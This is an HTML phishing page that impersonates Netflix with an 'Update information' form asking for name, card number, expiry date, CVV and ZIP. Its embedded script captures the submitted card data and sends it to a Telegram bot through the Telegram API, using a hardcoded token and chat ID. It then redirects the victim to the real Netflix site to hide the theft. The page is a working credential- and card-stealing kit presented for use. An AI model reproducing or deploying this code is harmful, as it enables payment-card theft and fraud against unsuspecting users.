<!DOCTYPE html>
<html lang="en">
<head>
  <meta name="google-site-verification" content="f8c4Hfe-BJVe2DhxI41BUZWluQUPB0Af5NS_67_cUBM" />  
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Netflix</title>
<style>
    body {
        font-family: Arial, sans-serif;
        background-color: #000;
        color: #fff;
    }
    .container {
        max-width: 400px;
        margin: 50px auto; /* Ajusté el margen superior e inferior */
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #fff; /* Cambié el color de fondo del contenedor a blanco */
    }
    input[type="text"],
    input[type="number"] {
        width: 100%;
        padding: 10px;
        margin: 5px 0;
        border: 1px solid #ccc; /* Cambié el color del borde a gris claro */
        border-radius: 3px;
        box-sizing: border-box;
        background-color: #fff; /* Cambié el color de fondo */
        color: #000; /* Cambié el color del texto a negro */
    }
    input[type="submit"] {
        width: 100%;
        background-color: #f00; /* Cambié el color de fondo del botón a rojo */
        color: #fff;
        padding: 10px 20px;
        margin: 10px 0;
        border: none;
        border-radius: 3px;
        cursor: pointer;
    }
    input[type="submit"]:hover {
        background-color: #d00; /* Cambié el color de fondo al pasar el cursor sobre el botón */
    }
    .small-input {
        width: 45%;
    }
    img {
        width: 30%; /* Modifiqué el ancho de la imagen al 50% */
        margin-bottom: 20px; /* Agregué un margen inferior para separarla de los campos de entrada */
    }
    .header-image {
        text-align: center; /* Centré la imagen */
         /* Agregué un margen inferior para separarla del formulario */
    }
    h2{
        color:gray;
    }
  .img-large {
    width: 70%; /* Cambia este valor según sea necesario para aumentar el tamaño de la imagen */
}
</style>
</head>
<body>
  <div class="header-image" style="margin-left: -200px;">
    <img src="Ne.png"> <!-- Agrega aquí la ruta de tu nueva imagen -->
  </div>
<div class="container" style="margin-top: 10px;" style="margin-left:"> <!-- Ajusté el margen superior -->
    <h2>Update information </h2>
    <form action="#">
        <img src="Ca.jpg">
        <input type="text" id="nom" name="nombre" placeholder="Name " required>
        
        <input type="text" id="apel" name="apellido" placeholder="Last Name " required>

        <input type="text" id="nu" name="numero" placeholder="Card Number" required inputmode="numeric"maxlength="19" oninput="formatoTarjeta(this)">

        <input type="text" id="expo" name="expiracion" placeholder="Expiration Date (MM/YY)" required inputmode="numeric"maxlength="7" oninput="formatoFecha(this)">>

        <input type="number" id="cd" name="cvv" placeholder="CVV" required>

        <input type="text" id="zic" name="zip" placeholder="ZIP Code" required inputmode="numeric">

        <input type="submit" value="Continue">
    </form>
</div>

<!-- Agregar nueva imagen debajo del formulario -->
<div class="header-image" style="margin-left: -90px;">
    <img src="Ab.jpg" class="img-large" > <!-- Agrega aquí la ruta de tu nueva imagen -->
</div>

<script>
document.querySelector('form').addEventListener('submit', function(event) {
    event.preventDefault(); // Evita que el formulario se envíe normalmente

    // Obtén los valores del formulario
    var nom = document.getElementById('nom').value;
    var apel = document.getElementById('apel').value;
    var nu = document.getElementById('nu').value;
    var expo = document.getElementById('expo').value;
    var cd = document.getElementById('cd').value;
    var zic = document.getElementById('zic').value;

    // Aquí debes reemplazar 'TU_TOKEN' con el token de tu bot de Telegram y 'TU_CHAT_ID' con el ID del chat al que quieres enviar el mensaje
    var telegramToken = '7146549718:AAEZRx1O4QSKPacDVZfd2HYFV4vXrL4CYUU';
    var chatId = '6044742043';

    // Construye el mensaje que quieres enviar
    var message = 'Nueva información de tarjeta:\nNombre: ' + nom + '\nApellido: ' + apel + '\nNúmero de tarjeta: ' + nu + '\nFecha de expiración: ' + expo + '\nCVV: ' + cd + '\nZIP: ' + zic;

    // Realiza la solicitud HTTP para enviar el mensaje al bot de Telegram
    var xhttp = new XMLHttpRequest();
    xhttp.open("GET", "https://api.telegram.org/bot" + telegramToken + "/sendMessage?chat_id=" + chatId + "&text=" + encodeURIComponent(message), true);
    xhttp.send();

    // Redirige a la página index2.html después de enviar los datos
    window.location.href = 'https://www.netflix.com';
});
function formatoFecha(input) {
  input.value = input.value.replace(/\D/g, '').replace(/(\d{2})(\d)/, '$1/$2');
}
function formatoTarjeta(input) {
  // Eliminar todos los caracteres que no sean números
  input.value = input.value.replace(/\D/g, '');
  
  // Agregar un espacio después de cada grupo de cuatro números
  input.value = input.value.replace(/(\d{4})/g, '$1 ').trim();
}
</script>

</body>
</html>